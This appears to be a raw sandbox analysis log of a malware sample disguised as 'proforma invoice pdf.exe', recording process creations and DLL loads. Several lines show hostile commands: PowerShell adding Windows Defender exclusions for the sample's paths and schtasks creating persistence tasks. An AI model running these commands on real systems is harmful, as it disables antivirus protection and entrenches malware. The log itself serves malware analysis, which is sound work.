Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Users\user\Desktop\proforma invoice pdf.exe "C:\Users\user\Desktop\proforma invoice pdf.exe"
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Users\user\Desktop\proforma invoice pdf.exe "C:\Users\user\Desktop\proforma invoice pdf.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wTyVrj.exe C:\Users\user\AppData\Roaming\wTyVrj.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp471D.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process created: C:\Users\user\AppData\Roaming\wTyVrj.exe "C:\Users\user\AppData\Roaming\wTyVrj.exe"
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process created: C:\Users\user\AppData\Roaming\wTyVrj.exe "C:\Users\user\AppData\Roaming\wTyVrj.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp6D52.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp889B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\proforma invoice pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wTyVrj.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp351C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Users\user\Desktop\proforma invoice pdf.exe "C:\Users\user\Desktop\proforma invoice pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Process created: C:\Users\user\Desktop\proforma invoice pdf.exe "C:\Users\user\Desktop\proforma invoice pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp471D.tmp"
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process created: C:\Users\user\AppData\Roaming\wTyVrj.exe "C:\Users\user\AppData\Roaming\wTyVrj.exe"
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Process created: C:\Users\user\AppData\Roaming\wTyVrj.exe "C:\Users\user\AppData\Roaming\wTyVrj.exe"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp6D52.tmp"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wTyVrj" /XML "C:\Users\user\AppData\Local\Temp\tmp889B.tmp"
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Process created: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe "C:\Users\user~1\AppData\Local\Temp\bmBOz\bmBOz.exe"

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Section loaded: dhcpcsvc.dll
